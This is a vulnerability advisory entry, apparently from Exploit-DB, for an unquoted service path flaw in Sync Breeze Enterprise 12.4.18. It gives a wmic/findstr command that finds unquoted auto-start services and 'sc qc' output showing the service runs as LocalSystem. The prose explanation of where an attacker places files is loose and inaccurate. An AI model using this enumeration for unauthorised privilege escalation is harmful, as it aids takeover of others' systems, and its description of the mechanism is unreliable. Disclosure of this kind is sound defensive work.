Sync Breeze Enterprise 12.4.18 - 'Sync Breeze Enterprise' Unquoted Service Path

vendor:

Sync Breeze Enterprise

by:

boku

7.8

CVSS

HIGH

Unquoted Service Path

426

CWE

Product Name: Sync Breeze Enterprise

Affected Version From: 12.4.18

Affected Version To: 12.4.18

Patch Exists: NO

Related CWE: N/A

CPE: a:syncbreeze:sync_breeze_enterprise:12.4.18

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10 (32-bit)

2020

Sync Breeze Enterprise 12.4.18 – ‘Sync Breeze Enterprise’ Unquoted Service Path

An unquoted service path vulnerability exists in Sync Breeze Enterprise 12.4.18. An attacker can exploit this vulnerability to gain elevated privileges on the system. The vulnerability is due to the Sync Breeze Enterprise service not being properly quoted. An attacker can exploit this vulnerability by placing malicious files in the same directory as the Sync Breeze Enterprise service executable. When the service is started, the malicious files will be executed with SYSTEM privileges.

Mitigation:

Ensure that all service paths are properly quoted and that only trusted files are placed in the same directory as the service executable.

Source

Exploit-DB raw data:

Exploit Title: Sync Breeze Enterprise 12.4.18 - 'Sync Breeze Enterprise' Unquoted Service Path
Exploit Author: boku
Date: 2020-02-10
Vendor Homepage: http://www.syncbreeze.com
Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v12.4.18.exe
Version: 12.4.18
Tested On: Windows 10 (32-bit)

C:\Users\elaglor>wmic service get name, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
Sync Breeze Enterprise          C:\Program Files\Sync Breeze Enterprise\bin\syncbrs.exe             Auto

C:\Users\elaglor>sc qc "Sync Breeze Enterprise"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Sync Breeze Enterprise
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\Sync Breeze Enterprise\bin\syncbrs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Sync Breeze Enterprise
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem